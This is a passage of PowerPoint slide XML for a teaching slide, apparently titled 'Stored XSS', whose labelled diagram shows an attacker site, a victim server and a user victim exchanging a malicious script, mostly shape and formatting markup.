            <a:off x="1904451" y="4678952"/>
            <a:ext cx="291738" cy="254000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="object 32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6092825" y="6449822"/>
            <a:ext cx="918210" cy="269240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="408000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>bank.com</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="object 33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5541962" y="1539240"/>
            <a:ext cx="2522855" cy="330200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Attack</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-80" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Browser/Server</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="object 34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6876546" y="2696972"/>
            <a:ext cx="1506220" cy="506095"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="600075">
              <a:lnSpc>
                <a:spcPts val="1650"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" spc="-5" dirty="0">
              <a:solidFill>
                <a:srgbClr val="B7C1EB"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPts val="2130"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:endParaRPr sz="2000" dirty="0">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="object 35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7618413" y="5400376"/>
            <a:ext cx="728345" cy="939800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700" marR="5080">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Stores  the  script!</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Title 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7528BBB-4517-A14B-BCF2-BBD851EC5ED9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>Stored XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D3DAFEE-6383-F941-AD8E-5323031CB2C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7085965" y="2696972"/>
            <a:ext cx="1448435" cy="259045"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CN" sz="1600" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.com</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09600" y="2678536"/>
            <a:ext cx="1417532" cy="1264284"/>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5959475" y="4979988"/>
            <a:ext cx="1148521" cy="1406460"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId3" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5483225" y="4587240"/>
            <a:ext cx="2199640" cy="330200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Server</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-80" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Patsy/Victim</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="301625" y="3901440"/>
            <a:ext cx="1290955" cy="330200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>User</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-85" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Victim</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2274888" y="3962400"/>
            <a:ext cx="2738120" cy="958850"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2738120" h="958850">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2738079" y="958251"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="28574">
            <a:solidFill>
              <a:srgbClr val="B7C1EB"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4957734" y="4865417"/>
            <a:ext cx="122523" cy="89237"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId4" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1080000">
            <a:off x="3122839" y="4088279"/>
            <a:ext cx="1780337" cy="254000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" spc="-7" baseline="2777" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>request</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-172" baseline="2777" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>content</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1080000">
            <a:off x="2399357" y="4595477"/>
            <a:ext cx="2600061" cy="254000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" spc="-7" baseline="2777" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>receive </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-145" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-7" baseline="-2777" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>script</a:t>
            </a:r>
            <a:endParaRPr sz="3000" baseline="-2777">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2713093" y="3703693"/>
            <a:ext cx="364490" cy="365125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="364489" h="365125">
                <a:moveTo>
                  <a:pt x="176405" y="365013"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="128133" y="356784"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="83746" y="336104"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47596" y="305546"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20826" y="267291"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4580" y="223518"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="176405"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8229" y="128133"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28908" y="83745"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59466" y="47595"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="97721" y="20826"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="141495" y="4580"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="188607" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="236879" y="8229"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="299433" y="42302"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="344187" y="97721"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="364325" y="166047"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="364061" y="201666"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="336104" y="281267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="305547" y="317417"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267292" y="344186"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="223518" y="360433"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="176405" y="365013"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="object 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2713093" y="3703693"/>
            <a:ext cx="364490" cy="365125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="364489" h="365125">
                <a:moveTo>
                  <a:pt x="8229" y="128133"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="28908" y="83745"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59466" y="47595"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="97721" y="20826"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="141495" y="4580"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="188607" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="236879" y="8229"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="299433" y="42302"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="344187" y="97721"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="364325" y="166047"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="364061" y="201666"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="356784" y="236879"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="336104" y="281267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="305547" y="317417"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267292" y="344186"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="223518" y="360433"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="176405" y="365013"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="128133" y="356784"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="83746" y="336104"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47596" y="305546"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20826" y="267291"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4580" y="223518"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="176405"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8229" y="128133"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="12699">
            <a:solidFill>
              <a:srgbClr val="B7C1EB"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="object 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1020000">
            <a:off x="2778214" y="3757967"/>
            <a:ext cx="290497" cy="254000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="object 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2084502" y="4086339"/>
            <a:ext cx="364490" cy="365125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="364489" h="365125">
                <a:moveTo>
                  <a:pt x="174796" y="364896"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="126596" y="356257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82385" y="335200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46496" y="304337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20053" y="265856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4179" y="221946"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="174796"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8639" y="126595"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29695" y="82385"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="60558" y="46496"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="99040" y="20052"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="142950" y="4179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="190099" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="238300" y="8639"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="300562" y="43243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="344843" y="99039"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="364400" y="167534"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="363833" y="203150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="335200" y="282510"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="304337" y="318399"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="265856" y="344843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="221946" y="360716"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="174796" y="364896"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="object 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2084502" y="4086339"/>
            <a:ext cx="364490" cy="365125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="364489" h="365125">
                <a:moveTo>
                  <a:pt x="8639" y="126595"/>
                </a:moveTo>
                <a:lnTo>
